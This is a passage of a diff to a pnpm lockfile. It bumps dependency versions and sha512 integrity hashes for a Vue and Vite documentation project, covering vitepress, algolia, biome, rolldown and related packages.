oniguruma-to-es@3.1.1: resolution: {integrity: sha512-bUH8SDvPkH3ho3dvwJwfonjlQ4R80vjyvrU8YpxuROddv55vAEJrTuCuCVUhhsHbtlD9tGGbaNApGQckXhS8iQ==} - parse5-htmlparser2-tree-adapter@6.0.1: - resolution: {integrity: sha512-qPuWvbLgvDGilKc5BoicRovlT4MtYT6JfJyBOMDsKoiT+GiuP5qyrPCnR9HcPECIJJmZh5jRndyNThnhhb/vlA==} - - parse5@6.0.1: - resolution: {integrity: sha512-Ofn/CTFzRGTTxwpNEs9PP93gXShHcTq255nzRYSKe8AkVpZY7e1fpmTfOyoIvjP5HG7Z2ZM7VS9PPhQGW2pOpw==} - path-browserify@1.0.1: resolution: {integrity: sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==} + pathe@2.0.3: + resolution: {integrity: sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==} + perfect-debounce@1.0.0: resolution: {integrity: sha512-xCy9V055GLEqoFaHoC1SoLIaLmWctgCUaBaWxDZ7/Zx4CTyX7cJQLJOok/orfjZAh9kEYpjJa4d0KcJmCbctZA==} + perfect-debounce@2.1.0: + resolution: {integrity: sha512-LjgdTytVFXeUgtHZr9WYViYSM/g8MkcTPYDlPa3cDqMirHjKiSZPYd6DoL7pK8AJQr+uWkQvCjHNdiMqsrJs+g==} + picocolors@1.1.1: resolution: {integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==} - picomatch@2.3.1: - resolution: {integrity: sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==} + picomatch@2.3.2: + resolution: {integrity: sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==} engines: {node: '>=8.6'} - picomatch@4.0.3: - resolution: {integrity: sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==} + picomatch@4.0.5: + resolution: {integrity: sha512-RvwwcruNjI1ncT5xRakeyS9Lf8lcItv34KD+aif+VH9kduAyfYBipGh12274xtenIPZ119/R9BdTBa8gAwSh0A==} engines: {node: '>=12'} - postcss@8.5.6: - resolution: {integrity: sha512-3Ybi1tAuwAP9s0r1UQ2J4n5Y0G05bJkpUIO0/bI9MhwmD70S5aTWbXGBwxHrelT+XM1k6dM0pk+SwNkpTRN7Pg==} + pkg-types@1.3.1: + resolution: {integrity: sha512-/Jm5M4RvtBFVkKWRu2BLUTNP8/M2a+UwuAX+ae4770q1qVGtfjG+WTCupoZixokjmHiry8uI+dlY8KXYV5HVVQ==} + + pkg-types@2.3.1: + resolution: {integrity: sha512-y+ichcgc2LrADuhLNAx8DFjVfgz91pRxfZdI3UDhxHvcVEZsenLO+7XaU5vOp0u/7V/wZ+plyuQxtrDlZJ+yeg==} + + postcss@8.5.16: + resolution: {integrity: sha512-vuwillviilfKZsg0VGj5R/YwwcHx4SLsIOI/7K6mQkWx+l5cUHTjj5g0AasTBcyXsbfTgrwsUNmVUb5xVwyPwg==} engines: {node: ^10 || ^12 || >=14} - preact@10.28.2: - resolution: {integrity: sha512-lbteaWGzGHdlIuiJ0l2Jq454m6kcpI1zNje6d8MlGAFlYvP2GO4ibnat7P74Esfz4sPTdM6UxtTwh/d3pwM9JA==} + preact@10.29.4: + resolution: {integrity: sha512-GMpwh9+NJ8tSmqwIaVyFRQkiKfBEzQ+k7r7tle4W+kaJ+7wJiB9hFz9BixAomMtenPPSBfM4bZhXozGxhf0uFQ==} prettier@3.5.2: resolution: {integrity: sha512-lc6npv5PH7hVqozBR7lkBNOGXV9vMwROAPlumdBkX0wTbbzPu/U1hk5yL8p2pt4Xoc+2mkT8t/sow2YrV/M5qg==} engines: {node: '>=14'} hasBin: true - property-information@7.1.0: - resolution: {integrity: sha512-TwEZ+X+yCJmYfL7TPUOcvBZ4QfoT5YenQiJuX//0th53DE6w0xxLEtfK3iyryQFddXuvkIk51EEgrJQ0WJkOmQ==} + property-information@7.2.0: + resolution: {integrity: sha512-IAtzIB6sUiWaJYrX9smp3V46pBGbBeLFRGdh25kg1334VcBlD8HzhPeNIWQH9zhGmo2itIe25EHt9dQP7G5hmg==} pstree.remy@1.1.8: resolution: {integrity: sha512-77DZwxQmxKnu3aR542U+X8FypNzbfJ+C5XQDk3uWjWxn6151aIMGthWYRXTqT1E5oJvg+ljaa2OJi+VfvCOQ8w==} + rc9@3.0.1: + resolution: {integrity: sha512-gMDyleLWVE+i6Sgtc0QbbY6pEKqYs97NGi6isHQPqYlLemPoO8dxQ3uGi0f4NiP98c+jMW6cG1Kx9dDwfvqARQ==} + readdirp@3.6.0: resolution: {integrity: sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==} engines: {node: '>=8.10.0'} + readdirp@5.0.0: + resolution: {integrity: sha512-9u/XQ1pvrQtYyMpZe7DXKv2p5CNvyVwzUB6uhLAnQwHMSgKMBR62lc7AHljaeteeHXn11XTAaLLUVZYVZyuRBQ==} + engines: {node: '>= 20.19.0'} + regex-recursion@6.0.2: resolution: {integrity: sha512-0YCaSCq2VRIebiaUviZNs0cBz1kg5kVS2UKUfNIx8YVs1cN3AV7NTctO5FOKBA+UT2BPJIWZauYHPqJODG50cg==} @@ -1217,25 +1565,37 @@ packages: rfdc@1.4.1: resolution: {integrity: sha512-q1b3N5QkRUWUl7iyylaaj3kOpIT0N2i9MqIEQXP73GVsN9cw3fdx8X63cEmWhJGi2PPCF23Ijp7ktmd39rawIA==} - rollup@4.59.0: - resolution: {integrity: sha512-2oMpl67a3zCH9H79LeMcbDhXW/UmWG/y2zuqnF2jQq5uq9TbM9TVyXvA4+t+ne2IIkBdrLpAaRQAvo7YI/Yyeg==} + rolldown-string@0.2.1: + resolution: {integrity: sha512-7H8oH5A8+L96pbBTPCt/rZrwayEhZY5/ejhdk9nRODH32H1v7+bfkaCr+kS15DcGQ7VC1HcWdQVNABFYgrMOzg==} + engines: {node: '>=20.19.0'} + + rolldown@1.1.4: + resolution: {integrity: sha512-IjZYiLxZwpnhwhdBH2ugdTGVSdhCQUmLxLoqyjiL0JxYjyRst+5a0P3xfrTxJ5F638j4Mvvw5FAX5XE6eHpXbA==} + engines: {node: ^20.19.0 || >=22.12.0} + hasBin: true + + rollup@4.62.2: + resolution: {integrity: sha512-RFnrW4lhXA3s3eqHDZvN654g8OTjzRfqpIRJYczCGB6HzphckVAi/Qh4tbPUbRuDi7s1Llv8g/NspLkttY3gTA==} engines: {node: '>=18.0.0', npm: '>=8.0.0'} hasBin: true - sass@1.76.0: - resolution: {integrity: sha512-nc3LeqvF2FNW5xGF1zxZifdW3ffIz5aBb7I7tSvOoNu7z1RQ6pFt9MBuiPtjgaI62YWrM/txjWlOCFiGtf2xpw==} - engines: {node: '>=14.0.0'} + sass@1.101.0: + resolution: {integrity: sha512-OL3GoQyoUdDt843DpVmDO6y2k1sc5IhUDSpu8XucEI+35neq5QivZ1iuegnpraEVTJXlQGK1gl27zKcTLEPbQw==} + engines: {node: '>=20.19.0'} hasBin: true - sax@1.5.0: - resolution: {integrity: sha512-21IYA3Q5cQf089Z6tgaUTr7lDAyzoTPx5HRtbhsME8Udispad8dC/+sziTNugOEx54ilvatQ9YCzl4KQLPcRHA==} + sax@1.6.0: + resolution: {integrity: sha512-6R3J5M4AcbtLUdZmRv2SygeVaM7IhrLXu9BmnOGmmACak8fiUtOsYNWUS4uK7upbmHIBbLBeFeI//477BKLBzA==} engines: {node: '>=11.0.0'} + scule@1.3.0: + resolution: {integrity: sha512-6FtHJEvt+pVMIB9IBY+IcCJ6Z5f1iQnytgyfKMhDKgmzYG+TeH/wx1y3l27rshSbLiSanrR9ffZDrEsmjlQF2g==} + search-insights@2.15.0: resolution: {integrity: sha512-ch2sPCUDD4sbPQdknVl9ALSi9H7VyoeVbsxznYz6QV55jJ8CI3EtwpO1i84keN4+hF5IeHWIeGvc08530JkVXQ==} - semver@7.7.3: - resolution: {integrity: sha512-SdsKMrI9TdgjdweUSR9MweHA4EJ8YxHn8DFaDisvhVlUOe4BF1tLD7GAj0lIqWVl+dPb/rExr0Btby5loQm20Q==} + semver@7.8.5: + resolution: {integrity: sha512-Y7/KDsb8LjooZpwaqGyulO6DQlksgCncchHGk+sZIY4SBvUocMBEFH5Ur1fI4dV+Jvl0w6cjvucaIi40puRioA==} engines: {node: '>=10'} hasBin: true @@ -1246,9 +1606,6 @@ packages: resolution: {integrity: sha512-a2B9Y0KlNXl9u/vsW6sTIu9vGEpfKu2wRV6l1H3XEas/0gUIzGzBoP/IouTcUQbm9JWZLH3COxyn03TYlFax6w==} engines: {node: '>=10'} - slick@1.12.2: - resolution: {integrity: sha512-4qdtOGcBjral6YIBCWJ0ljFSKNLz9KkhbWtuGvUyRowl1kxfuE1x/Z/aJcaiilpb3do9bl5K7/1h9XC5wWpY/A==} - source-map-js@1.2.1: resolution: {integrity: sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==} engines: {node: '>=0.10.0'} @@ -1260,10 +1617,6 @@ packages: resolution: {integrity: sha512-1POYv7uv2gXoyGFpBCmpDVSNV74IfsWlDW216UPjbWufNf+bSU6GdbDsxdcxtfwb4xlI3yxzOTKClUosxARYrQ==} engines: {node: '>=0.10.0'} - speech-rule-engine@4.1.2: - resolution: {integrity: sha512-S6ji+flMEga+1QU79NDbwZ8Ivf0S/MpupQQiIC0rTpU/ZTKgcajijJJb1OcByBQDjrXCN1/DJtGz4ZJeBMPGJw==} - hasBin: true - stringify-entities@4.0.4: resolution: {integrity: sha512-IwfBptatlO+QCJUo19AqvrPNqlVMpW9YEL2LIVY+Rpv2qsjCGxaDLNRgeGsQWJhfItebuJhsGSLjaBbNSQ+ieg==} @@ -1280,8 +1633,12 @@ packages: engines: {node: '>=14.0.0'} hasBin: true - tabbable@6.4.0: - resolution: {integrity: sha512-05PUHKSNE8ou2dwIxTngl4EzcnsCDZGJ/iCLtDflR/SHB/ny14rXc+qU5P4mG9JkusiV7EivzY9Mhm55AzAvCg==} + tabbable@6.5.0: + resolution: {integrity: sha512-wieBHXygIm7OyQOu5hQlkk62/WyCFYGlWg7L6/ZCUZwx0o398Zkn4pVmMyfYhfMG8kGrj/Krt8eIk6UKC6VzwA==} + + tinyglobby@0.2.17: + resolution: {integrity: sha512-wXR/dYpcqKmfWpEdZjiKJOwCNFndD0DMnrW/cYjVGttEkBfVgcLFHoNrlj47mjOVic9yyNu65alsgF4NQyTa2g==} + engines: {node: '>=12.0.0'} to-regex-range@5.0.1: resolution: {integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==} @@ -1291,25 +1648,32 @@ packages: resolution: {integrity: sha512-r0eojU4bI8MnHr8c5bNo7lJDdI2qXlWWJk6a9EAFG7vbhTjElYhBVS3/miuE0uOuoLdb8Mc/rVfsmm6eo5o9GA==} hasBin: true - tr46@0.0.3: - resolution: {integrity: sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==} - trim-lines@3.0.1: resolution: {integrity: sha512-kRj8B+YHZCc9kQYdWfJB2/oUl9rA99qbowYYBtr4ui4mZyAQ2JpvVBd/6U2YloATfqBhBTSMhTpgBHtU0Mf3Rg==} tslib@2.8.1: resolution: {integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w==} - typescript@5.9.3: - resolution: {integrity: sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw==} + type-fest@4.41.0: + resolution: {integrity: sha512-TeTSQ6H5YHvpqVwBRcnLDCBnDOHWYu7IvGbHT6N8AOymcr9PJGjc1GTtiWZTYg0NCgYwvnYWEkVChQAr9bjfwA==} + engines: {node: '>=16'} + + typescript@6.0.3: + resolution: {integrity: sha512-y2TvuxSZPDyQakkFRPZHKFm+KKVqIisdg9/CZwm9ftvKXLP8NRWj38/ODjNbr43SsoXqNuAisEf1GdCxqWcdBw==} engines: {node: '>=14.17'} hasBin: true + ufo@1.6.4: + resolution: {integrity: sha512-JFNbkD1Svwe0KvGi8GOeLcP4kAWQ609twvCdcHxq1oSL8svv39ZuSvajcD8B+5D0eL4+s1Is2D/O6KN3qcTeRA==} + + unctx@2.5.0: + resolution: {integrity: sha512-p+Rz9x0R7X+CYDkT+Xg8/GhpcShTlU8n+cf9OtOEf7zEQsNcCZO1dPKNRDqvUTaq+P32PMMkxWHwfrxkqfqAYg==} + undefsafe@2.0.5: resolution: {integrity: sha512-WxONCrssBM8TSPRqN5EmsjVrsv4A8X12J4ArBiiayv3DyyG3ZlIg6yysuuSYdZsVz3TKcTg2fd//Ujd4CHV1iA==} - undici-types@6.21.0: - resolution: {integrity: sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==} + undici-types@8.3.0: + resolution: {integrity: sha512-j375ScV60dom+YkPFIfTLcOiPxkN/buHz5GobjLhixFuANaNs3C9l4GmrWqejgXWJ7BbJcFYpTEUkS1Ge8bpZQ==} unist-util-is@6.0.1: resolution: {integrity: sha512-LsiILbtBETkDz8I9p1dQ0uyRUWuaQzd/cuEeS1hoRSyW5E5XGmTzlwY1OrNzzakGowI9Dr/I8HVaw4hTtnxy8g==} @@ -1323,20 +1687,20 @@ packages: unist-util-visit-parents@6.0.2: resolution: {integrity: sha512-goh1s1TBrqSqukSc8wrjwWhL0hiJxgA8m4kFxGlQ+8FYQ3C/m11FcTs4YYem7V664AhHVvgoQLk890Ssdsr2IQ==} - unist-util-visit@5.0.0: - resolution: {integrity: sha512-MR04uvD+07cwl/yhVuVWAtw+3GOR/knlL55Nd/wAdblk27GCVt3lqpTivy/tkJcZoNPzTwS1Y+KMojlLDhoTzg==} + unist-util-visit@5.1.0: + resolution: {integrity: sha512-m+vIdyeCOpdr/QeQCu2EzxX/ohgS8KbnPDgFni4dQsfSCtpz8UqDyY5GjRru8PDKuYn7Fq19j1CQ+nJSsGKOzg==} - unplugin-element-plus@0.8.0: - resolution: {integrity: sha512-jByUGY3FG2B8RJKFryqxx4eNtSTj+Hjlo8edcOdJymewndDQjThZ1pRUQHRjQsbKhTV2jEctJV7t7RJ405UL4g==} - engines: {node: '>=14.19.0'} + unplugin-element-plus@0.11.2: + resolution: {integrity: sha512-jr88ePpv43h8cCmVW0SqM73sTD+g1n9Rmy4uMbTh+pSmceH9ZdKteWX9f+twC4aDlP3svdZuKMqLoUNBT2V6Tg==} + engines: {node: '>=20.19.0'} - unplugin@1.16.1: - resolution: {integrity: sha512-4/u/j4FrCKdi17jaxuJA0jClGxB1AvU2hw/IuayPc4ay1XGaJs/rbb4v5WKwAjNifjmXK9PIFyuPiaK8azyR9w==} - engines: {node: '>=14.0.0'} + unplugin@2.3.11: + resolution: {integrity: sha512-5uKD0nqiYVzlmCRs01Fhs2BdkEgBS3SAVP6ndrBsuK42iC2+JHyxM05Rm9G8+5mkmRtzMZGY8Ct5+mliZxU/Ww==} + engines: {node: '>=18.12.0'} - valid-data-url@3.0.1: - resolution: {integrity: sha512-jOWVmzVceKlVVdwjNSenT4PbGghU0SBIizAev8ofZVgivk/TVHXSbNL8LP6M3spZvkR9/QolkyJavGSX5Cs0UA==} - engines: {node: '>=10'} + untyped@2.0.0: + resolution: {integrity: sha512-nwNCjxJTjNuLCgFr42fEak5OcLuB3ecca+9ksPFNvtfYSLpjf+iJqSIaSnIile6ZPbKYxI5k2AfXqeopGudK/g==} + hasBin: true vfile-message@4.0.3: resolution: {integrity: sha512-QTHzsGd1EhbZs4AsQ20JX1rC3cOlt/IWJruk893DfLRr57lcnOeMaWG4K0JrRta4mIJZKth2Au3mM3u03/JWKw==} @@ -1344,8 +1708,8 @@ packages: vfile@6.0.3: resolution: {integrity: sha512-KzIbH/9tXat2u30jf+smMwFCsno4wHVdNmzFyL+T/L3UGqqk6JKfVqOFOZEpZSHADH1k40ab6NUIXZq422ov3Q==} - vite-svg-loader@5.1.0: - resolution: {integrity: sha512-M/wqwtOEjgb956/+m5ZrYT/Iq6Hax0OakWbokj8+9PXOnB7b/4AxESHieEtnNEy7ZpjsjYW1/5nK8fATQMmRxw==} + vite-svg-loader@5.1.1: + resolution: {integrity: sha512-RPzcXA/EpKJA0585x58DBgs7my2VfeJ+j2j1EoHY4Zh82Y7hV4cR1fElgy2aZi85+QSrcLLoTStQ5uZjD68u+Q==} peerDependencies: vue: '>=3.2.13' @@ -1380,6 +1744,49 @@ packages: terser: optional: true + vite@8.1.3: + resolution: {integrity: sha512-Ds+gBRbj0lwRO2Y5hwnUBdxSwlAve9LeRyU4sNnAr0ewW0gWF0n5bgXgUzbgZ49MV9BVUAQUFYVcDUcilUExMA==} + engines: {node: ^20.19.0 || >=22.12.0} + hasBin: true + peerDependencies: + '@types/node': ^20.19.0 || >=22.12.0 + '@vitejs/devtools': ^0.3.0 + esbuild: ^0.27.0 || ^0.28.0 + jiti: '>=1.21.0' + less: ^4.0.0 + sass: ^1.70.0 + sass-embedded: ^1.70.0 + stylus: '>=0.54.8' + sugarss: ^5.0.0 + terser: ^5.16.0 + tsx: ^4.8.1 + yaml: ^2.4.2 + peerDependenciesMeta: + '@types/node': + optional: true + '@vitejs/devtools': + optional: true + esbuild: + optional: true + jiti: + optional: true + less: + optional: true + sass: + optional: true + sass-embedded: + optional: true + stylus: + optional: true + sugarss: + optional: true + terser: + optional: true + tsx: + optional: true + yaml: + optional: true + vitepress@1.6.4: resolution: {integrity: sha512-+2ym1/+0VVrbhNyRoFFesVvBvHAVMZMK0rw60E3X/5349M1GuVdKeazuksqopEdvkKwKGs21Q729jX81/bkBJg==} hasBin: true @@ -1395,49 +1802,28 @@ packages: vscode-uri@3.1.0: resolution: {integrity: sha512-/BpdSx+yCQGnCvecbyXdxHDkuk55/G3xwnC0GqY4gmQ3j+A+g8kzzgB4Nk/SINjqn6+waqw3EgbVF2QKExkRxQ==} - vue-demi@0.14.10: - resolution: {integrity: sha512-nMZBOwuzabUO0nLgIcc6rycZEebF6eeUfaiQx9+WSk8e29IbLvPU9feI6tqW4kTo3hvoYAJkMh8n8D0fuISphg==} - engines: {node: '>=12'} - hasBin: true - peerDependencies: - '@vue/composition-api': ^1.0.0-rc.1 - vue: ^3.0.0-0 || ^2.6.0 - peerDependenciesMeta: - '@vue/composition-api': - optional: true + vue-component-type-helpers@3.3.6: + resolution: {integrity: sha512-FkljacAwJ9BUoSUdpFe3VDy0sGigNlTH9+2zcXUWmZOjN8swiCkl3t48wOJun0OsUd2cEIda1l04tsxMiKIIrQ==} - vue-tsc@2.2.12: - resolution: {integrity: sha512-P7OP77b2h/Pmk+lZdJ0YWs+5tJ6J2+uOQPo7tlBnY44QqQSPYvS0qVT4wqDJgwrZaLe47etJLLQRFia71GYITw==} + vue-tsc@3.3.6: + resolution: {integrity: sha512-ERXGgbKSBGFUkavrJ1Iwj0ZVxKqB/5UOx65IXy7fPf2UsoI21n3ssQLwdvx8xyUGgJe9PvSZTM/FYzIdwUDPFA==} hasBin: true peerDependencies: typescript: '>=5.0.0' - vue@3.5.29: - resolution: {integrity: sha512-BZqN4Ze6mDQVNAni0IHeMJ5mwr8VAJ3MQC9FmprRhcBYENw+wOAAjRj8jfmN6FLl0j96OXbR+CjWhmAmM+QGnA==} + vue@3.5.39: + resolution: {integrity: sha512-xmZCYabFGcirU8r0fTuvl/LICc1OU620rnqepaJDL/a141ZigkG7AyaxQLdqJ02ZRYzWe6YPaDHeQx7MfknQfA==} peerDependencies: typescript: '*' peerDependenciesMeta: typescript: optional: true - web-resource-inliner@6.0.1: - resolution: {integrity: sha512-kfqDxt5dTB1JhqsCUQVFDj0rmY+4HLwGQIsLPbyrsN9y9WV/1oFDSx3BQ4GfCv9X+jVeQ7rouTqwK53rA/7t8A==} - engines: {node: '>=10.0.0'} - - webidl-conversions@3.0.1: - resolution: {integrity: sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==} - webpack-virtual-modules@0.6.2: resolution: {integrity: sha512-66/V2i5hQanC51vBQKPH4aI8NMAcBW59FVBs+rC7eGHupMyfn34q7rZIE+ETlJ+XTevqfUhVVBgSUNSW2flEUQ==} - whatwg-url@5.0.0: - resolution: {integrity: sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==} - - wicked-good-xpath@1.3.0: - resolution: {integrity: sha512-Gd9+TUn5nXdwj/hFsPVx5cuHHiF5Bwuc30jZ4+ronF1qHK5O7HD0sgmXWSEgwKquT3ClLoKPVbO6qGwVwLzvAw==} - - yaml@2.8.2: - resolution: {integrity: sha512-mplynKqc1C2hTVYxd0PU2xQAc22TI1vShAYGksCCfxbn/dFwnHTNi1bvYsBTkhdUNtGIf5xNOg938rrSSYvS9A==} + yaml@2.9.0: + resolution: {integrity: sha512-2AvhNX3mb8zd6Zy7INTtSpl1F15HW6Wnqj0srWlkKLcpYl/gMIMJiyuGq2KeI2YFxUPjdlB+3Lc10seMLtL4cA==} engines: {node: '>= 14.6'} hasBin: true @@ -1446,378 +1832,586 @@ packages: snapshots: - '@algolia/abtesting@1.13.0': + '@algolia/abtesting@1.21.1': dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 - '@algolia/autocomplete-core@1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0)(search-insights@2.15.0)': + '@algolia/autocomplete-core@1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1)(search-insights@2.15.0)': dependencies: - '@algolia/autocomplete-plugin-algolia-insights': 1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0)(search-insights@2.15.0) - '@algolia/autocomplete-shared': 1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0) + '@algolia/autocomplete-plugin-algolia-insights': 1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1)(search-insights@2.15.0) + '@algolia/autocomplete-shared': 1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1) transitivePeerDependencies: - '@algolia/client-search' - algoliasearch - search-insights - '@algolia/autocomplete-plugin-algolia-insights@1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0)(search-insights@2.15.0)': + '@algolia/autocomplete-plugin-algolia-insights@1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1)(search-insights@2.15.0)': dependencies: - '@algolia/autocomplete-shared': 1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0) + '@algolia/autocomplete-shared': 1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1) search-insights: 2.15.0 transitivePeerDependencies: - '@algolia/client-search' - algoliasearch - '@algolia/autocomplete-preset-algolia@1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0)': + '@algolia/autocomplete-preset-algolia@1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1)': + dependencies: + '@algolia/autocomplete-shared': 1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1) + '@algolia/client-search': 5.55.1 + algoliasearch: 5.55.1 + + '@algolia/autocomplete-shared@1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1)': + dependencies: + '@algolia/client-search': 5.55.1 + algoliasearch: 5.55.1 + + '@algolia/client-abtesting@5.55.1': dependencies: - '@algolia/autocomplete-shared': 1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0) - '@algolia/client-search': 5.47.0 - algoliasearch: 5.47.0 + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 - '@algolia/autocomplete-shared@1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0)': + '@algolia/client-analytics@5.55.1': dependencies: - '@algolia/client-search': 5.47.0 - algoliasearch: 5.47.0 + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 - '@algolia/client-abtesting@5.47.0': + '@algolia/client-common@5.55.1': {} + + '@algolia/client-insights@5.55.1': + dependencies: + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 + + '@algolia/client-personalization@5.55.1': dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 - '@algolia/client-analytics@5.47.0': + '@algolia/client-query-suggestions@5.55.1': dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 - '@algolia/client-common@5.47.0': {} + '@algolia/client-search@5.55.1': + dependencies: + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 - '@algolia/client-insights@5.47.0': + '@algolia/ingestion@1.55.1': dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 + + '@algolia/monitoring@1.55.1': + dependencies: + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 + + '@algolia/recommend@5.55.1': + dependencies: + '@algolia/client-common': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 + + '@algolia/requester-browser-xhr@5.55.1': + dependencies: + '@algolia/client-common': 5.55.1 + + '@algolia/requester-fetch@5.55.1': + dependencies: + '@algolia/client-common': 5.55.1 + + '@algolia/requester-node-http@5.55.1': + dependencies: + '@algolia/client-common': 5.55.1 + + '@babel/helper-string-parser@7.29.7': {} + + '@babel/helper-validator-identifier@7.29.7': {} + + '@babel/parser@7.29.7': + dependencies: + '@babel/types': 7.29.7 + + '@babel/types@7.29.7': + dependencies: + '@babel/helper-string-parser': 7.29.7 + '@babel/helper-validator-identifier': 7.29.7 + + '@biomejs/biome@2.5.2': + optionalDependencies: + '@biomejs/cli-darwin-arm64': 2.5.2 + '@biomejs/cli-darwin-x64': 2.5.2 + '@biomejs/cli-linux-arm64': 2.5.2 + '@biomejs/cli-linux-arm64-musl': 2.5.2 + '@biomejs/cli-linux-x64': 2.5.2 + '@biomejs/cli-linux-x64-musl': 2.5.2 + '@biomejs/cli-win32-arm64': 2.5.2 + '@biomejs/cli-win32-x64': 2.5.2 + + '@biomejs/cli-darwin-arm64@2.5.2': + optional: true + + '@biomejs/cli-darwin-x64@2.5.2': + optional: true + + '@biomejs/cli-linux-arm64-musl@2.5.2': + optional: true + + '@biomejs/cli-linux-arm64@2.5.2': + optional: true + + '@biomejs/cli-linux-x64-musl@2.5.2': + optional: true + + '@biomejs/cli-linux-x64@2.5.2': + optional: true + + '@biomejs/cli-win32-arm64@2.5.2': + optional: true + + '@biomejs/cli-win32-x64@2.5.2': + optional: true + + '@ctrl/tinycolor@4.2.0': {} + + '@docsearch/css@3.8.2': {} + + '@docsearch/js@3.8.2(@algolia/client-search@5.55.1)(search-insights@2.15.0)': + dependencies: + '@docsearch/react': 3.8.2(@algolia/client-search@5.55.1)(search-insights@2.15.0) + preact: 10.29.4 + transitivePeerDependencies: + - '@algolia/client-search' + - '@types/react' + - react + - react-dom + - search-insights + + '@docsearch/react@3.8.2(@algolia/client-search@5.55.1)(search-insights@2.15.0)': + 